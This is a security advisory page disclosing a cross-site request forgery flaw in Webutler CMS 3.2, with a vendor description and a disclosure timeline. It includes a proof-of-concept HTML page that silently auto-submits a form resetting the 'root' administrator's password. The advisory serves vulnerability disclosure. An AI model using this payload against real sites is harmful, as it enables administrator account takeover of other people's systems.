Webutler CMS 3.2 Cross Site Request Forgery

2016.04.22
Credit: Keerati T.
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

*# Exploit Title: Webutler CMS Cross-Site Request Forgery* *# Date: 18 April 2016* *# Exploit Author: Keerati T. (Post)* *# Vendor Homepage: http://webutler.de/en <http://webutler.de/en>* *# Software Link: http://webutler.de/download/webutler_v3.2.zip <http://webutler.de/download/webutler_v3.2.zip>* *# Version: 3.2* *# Tested on: Linux* *1.Description* The Webutler is a simple online page editor for static HTML files. Webmasters can provide a simple login option for image and text editing to their customers. The Webutler is a tool for websites or projects to be implemented with a small effort. The project has grown over the years and now you can do a lot of things with it. The all of administrative function allow any users to perform HTTP request without verify the request. This exploit can be performed while the logged on user (administrator) visit malicious web page that embedded HTML form. *2. Proof of Concept* Only change password function PoC, But other function (add page, delete page, etc..) can be exploited. <html> <body> <form action="http://10.0.0.102/webutler/admin/system/save.php" method="POST"> <input type="hidden" name="saveuser" value="1" /> <!-- administrator user name is "root" --> <input type="hidden" name="username" value="root" /> <input type="hidden" name="userpass1" value="111111" /> <input type="hidden" name="userpass2" value="111111" /> <input type="hidden" name="userlang" value="en" /> </form> </body> <script>document.forms[0].submit();</script> </html> *3. Timeline* 11 Apr 2016 - Vulnerability discover. 11 Apr 2016 - No main contact available on vendor web page. Ask related contact that shown on vendor web page instead. 18 Apr 2016 - No response from related contact and vulnerability disclosed.

References:

http://webutler.de/download/webutler_v3.2.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top